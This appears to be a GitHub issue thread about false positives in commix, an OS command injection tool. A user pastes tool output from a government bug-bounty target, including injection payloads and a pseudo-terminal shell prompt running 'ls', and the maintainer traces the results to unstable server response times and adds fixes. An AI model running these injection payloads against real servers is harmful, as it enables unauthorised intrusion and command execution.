Comments (17)
@vincentubuntu hmm according to the payload, i can assume that it is false positive
which is probably due to the server's response time. I added a fix at 8e82392. Please update commix and try again.
from commix.
still the same SIr.
__
___ ___ ___ ___ ___ ___ /\ __ _
/'**\ / __\ /' __
__\ /' __
`/\ \ /\ /'\
/\ **//\ \L\ /\ /\ /\ /\ /\ /\ \ \ /> </
\ **\ **/\ \ \ \ \ \ \ //
//// //////////////////
{ v0.1b-8e82392 }
+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
+--
() Checking connection to the target URL... SUCCEED Testing the file-based semiblind injection technique...
() Trying to upload the 'WABKLN.txt' on /var/www/... 2% Error: It seems that you don't have permissions to write on /var/www/.
(?) Do you want to try the temporary directory (/tmp/) [Y/n] > y
() Trying to upload file, on temporary directory (/tmp/)...
(!) The estimated response time is 1 second.
() Testing the tempfile-based injection technique... SUCCEED The (GET) 'term' parameter is vulnerable to Semiblind-based Command Injection.
(+) Type : Semiblind-based Command Injection
(+) Technique : Tempfile-Based Injection Technique
(+) Payload : || echo 'WUZZYX' > /tmp/WUZZYX.txt | [ 6 -ne $(cat "/tmp/WUZZYX.txt" | tr -d '\n' | wc -c) ] || sleep 2
() Retrieving the length of execution output... SUCCEED Retrieved 3 characters.
() Grabbing the output from '/tmp/WUZZYX.txt', please wait... [ 100% ]
(!) The hostname is '0+.
from commix.
is it can be due to firewall ???
from commix.
@stasinopoulos
this is time-base
___ ___ ___ ___ ___ ___ /\ __ _
/'**\ / __\ /' __
__\ /' __
`/\ \ /\ /'\
/\ **//\ \L\ /\ /\ /\ /\ /\ /\ \ \ /> </
\ **\ **/\ \ \ \ \ \ \ //
//// ////////////////// { v0.1b-8e82392 }
+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
+--
() Checking connection to the target URL... SUCCEED The estimated response time is 1 second.
() Testing the time-based injection technique... SUCCEED The (GET) 'term' parameter is vulnerable to Blind-based Command Injection.
(+) Type : Blind-based Command Injection
(+) Technique : Time-Based Injection Technique
(+) Payload : ; str=$(echo VNVPBT); str1=${#str}; if [ 6 -ne ${str1} ]; then sleep 0; else sleep 2; fi
() Retrieving the length of execution output... SUCCEED Retrieved 3 characters.
() Grabbing the output, please wait... [ 100% ]
(!) The hostname is 6(7.
(?) Do you want a Pseudo-Terminal shell? [Y/n] > y
Pseudo-Terminal (type 'q' or use to quit)
Shell > ls
() Retrieving the length of execution output... SUCCEED Retrieved 9 characters.
() Grabbing the output, please wait... [ 100% ]
% " $
from commix.
Very weird situation. The problem is that i can't reproduce the error in order to understand the reason of failure. I would recommend (if you know that the target has python installed) to use '--alter-shell="python"'.
from commix.
actually when i test other site which arenot vulnerable it cant even upload in tmp folder --returning not acceptable but here in that bug bounty website we can upload in tmp folder.--is that a conclusion of its not a false positive??ok ill test it again with --alter-shell="python"
from commix.
if u want i can give u the link..cause its still open for bug bounty
from commix.
Ok send me an email with the link. Thanks
from commix.
commix --url="http://xxx.xxx/search?term=INJECT_HERE" --technique=t --random-agent --hostname --alter-shell="python"
__
___ ___ ___ ___ ___ ___ /\ __ _
/'**\ / __\ /' __
__\ /' __
`/\ \ /\ /'\
/\ **//\ \L\ /\ /\ /\ /\ /\ /\ \ \ /> </
\ **\ **/\ \ \ \ \ \ \ //
//// ////////////////// { v0.1b-8e82392 }
+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
+--
() Checking connection to the target URL... SUCCEED The estimated response time is 1 second.
() Testing the time-based injection technique... SUCCEED The (GET) 'term' parameter is vulnerable to Blind-based Command Injection.
(+) Type : Blind-based Command Injection
(+) Technique : Time-Based Injection Technique
(+) Payload : || [ 6 -ne
() Retrieving the length of execution output... SUCCEED Retrieved 13 characters.
() Grabbing the output, please wait... [ 100% ]
(!) The hostname is !$ 3!!&5, .& .
full link..you might know the reason..of failure
from commix.
today they will announce no.1 in buy bounty am the only one..they ask me to "cat" out some content inside the server i cant perform..lol
from commix.
incase you might think its illegal:- this the bounty side announcement
UPDATE: The Submission deadline has been extended to 3:00 PM.
Note: The URL for SenhriHack is xxxxxx
The main aim of Senhri Security Testing Contest is to find security vulnerabilities that exists in the Goverment Content Management System (Senhri).
PRIZES:
First Prize – Rs 30,000 + Certificate + Trophy
Second Prize – Rs 20,000 + Certificate + Trophy
Third Prize – Rs 10,000 + Certificate + Trophy
RULES AND GUIDELINES:
The contest will be open to anyone
Individual/Team Participation
Participants should register online on the website www.diw.mizoram.gov.in
Contest closing date and last date of submission will be up to 4th July 2015 11:00AM
Evaluation will be done between 4th and 6th July 2015
Final results will be published on Digital Week website on 7th July 2015 and prizes distribution will be done on the same day.
Any kind of denial of service (DDOS) attacks will be treated as invalid.
The organizer will have the rights to reject or disqualify any entry deemed unsuitable.
Exploits reported should be accompanied by tools used and steps to reproduce the same.
Merely finding a vulnerability is not enough. Only successful exploits will be accepted as valid entry.
The security vulnerabilities should exist within the confines of the Content Management System(Senhri). Security vulnerabilities found within the server environment will not be counted.
Testing should be done only on the mentioned url (http:/xxxxx.in). Anyone found hacking or attacking other government live sites will be disqualified.
from commix.
inform me whether its tools fault or website failure..when you ready Sir.
today is last date for evaluation,so i have to inform them whether i can
upload or do "cat"
On Tue, Jul 7, 2015 at 4:01 AM, Anastasios Stasinopoulos <
[email protected]> wrote:
Ok send me an email with the link. Thanks
—
Reply to this email directly or view it on GitHub
#4 (comment).
from commix.
The target host, seems to be not vulnerable to command injection attacks. The reason of false positive was the non-stable server's response time (1-3 seconds). I added a hotfix (011a159) in order to limit that fault behavior. Thanks @vincentubuntu for the heads up!
from commix.
Thanks..then ill update it..
On 7 Jul 2015 20:04, "Anastasios Stasinopoulos" [email protected]
wrote:
The target host, seems to be not vulnerable to command injection attacks.
The reason of false positive was the non-stable server's response time (1-3
seconds). I added a hotfix (011a159
011a159)
in order to limit that fault behavior. Thanks @vincentubuntu
https://github.com/vincentubuntu for the heads up![image: screenshot from 2015-07-07 17 28 58]
https://cloud.githubusercontent.com/assets/5289251/8548559/1dfce8aa-24ce-11e5-90b8-c9da93635510.png—
Reply to this email directly or view it on GitHub
#4 (comment).
from commix.
commix --url="http://xxxx/search?term=INJECT_HERE" --technique=t
__
___ ___ ___ ___ ___ ___ /\ __ _
/'**\ / __\ /' __
__\ /' __
`/\ \ /\ /'\
/\ **//\ \L\ /\ /\ /\ /\ /\ /\ \ \ /> </
\ **\ **/\ \ \ \ \ \ \ //
//// ////////////////// { v0.1b-011a159 }
+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
+--
() Checking connection to the target URL... SUCCEED The estimated response time is 2 seconds.
() Testing the time-based injection technique... SUCCEED The (GET) 'term' parameter is vulnerable to Blind-based Command Injection.
(+) Type : Blind-based Command Injection
(+) Technique : Time-Based Injection Technique
(+) Payload : & sleep 0 && str=$(echo AHCSGI) && str1=${#str} && [ 6 -eq ${str1} ] && sleep 3 \
(?) Do you want a Pseudo-Terminal shell? [Y/n] > y
Pseudo-Terminal (type 'q' or use to quit)
Shell > ls
() Retrieving the length of execution output... SUCCEED Retrieved 27 characters.
() Grabbing the output, please wait... [ 22% ]
still same for time-based
from commix.
A reliability check has been added (8498f05) on the used payloads (time-based attacks). This check evaluates the injection's behavior, in order to prevent false positive results.
from commix.
This issue has been automatically locked since there has not been any recent activity after it was closed. Please open a new issue for related issues.
from commix.
Related Issues (20)
- ModuleNotFoundError: No module named 'src.thirdparty.six.moves' | NameError: name 'settings' is not defined HOT 2
- How can I do blind injection? HOT 2
- Bug Report: Unhandled exception "UnicodeEncodeError: 'gbk' codec can't encode character '\u032b' in position 38: illegal multibyte sequence" (#c8270b10) HOT 1
- Bug Report: Unhandled exception "UnicodeEncodeError: 'gbk' codec can't encode character '\u013e' in position 29: illegal multibyte sequence" (#c8270b10) HOT 2
- Bug Report: Unhandled exception "UnicodeEncodeError: 'ascii' codec can't encode characters in position 10-11: ordinal not in range(128)" (#77e253d5) HOT 2
- Tor start bug HOT 2
- Bug Report: Unhandled exception "UnicodeEncodeError: 'gbk' codec can't encode character '\u0579' in position 25: illegal multibyte sequence" (#c8270b10) HOT 2
- Bug Report: Unhandled exception "ValueError: Empty module name" (#08032667) HOT 1
- NameError: name 'settings' is not defined & ModuleNotFoundError: No module named 'src.thirdparty.six.moves' HOT 7
- Unhandled exception (#bf93605a) HOT 2
- Bug Report: Unhandled exception "http.client.IncompleteRead: IncompleteRead(0 bytes read)" (#d3796db0) HOT 2
- Bug Report: Unhandled exception "IndexError: list index out of range" (#3cecc724) HOT 1
- Bug Report: Unhandled exception "IndexError: list index out of range" (#3cecc724) HOT 1
- Bug Report: Unhandled exception "AttributeError: 'Values' object has no attribute 'ignore_stdin'" (#c5c65ede) HOT 2
- Bug Report: Unhandled exception "IndexError: list index out of range" (#4f8f4280)
- Unhandled exception (#659779b9) HOT 1
- Bug Report: Unhandled exception "UnboundLocalError: cannot access local variable 'result' where it is not associated with a value" (#fe6d97aa)
- Bug Report: Unhandled exception "SyntaxError: invalid syntax" (#c6469b6a)
- Bug Report: Unhandled exception "http.client.IncompleteRead: IncompleteRead(50818 bytes read)" (#8f4673b1) HOT 1
- Bug Report: Unhandled exception "io.UnsupportedOperation: fileno" (#554eb00e)
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from commix.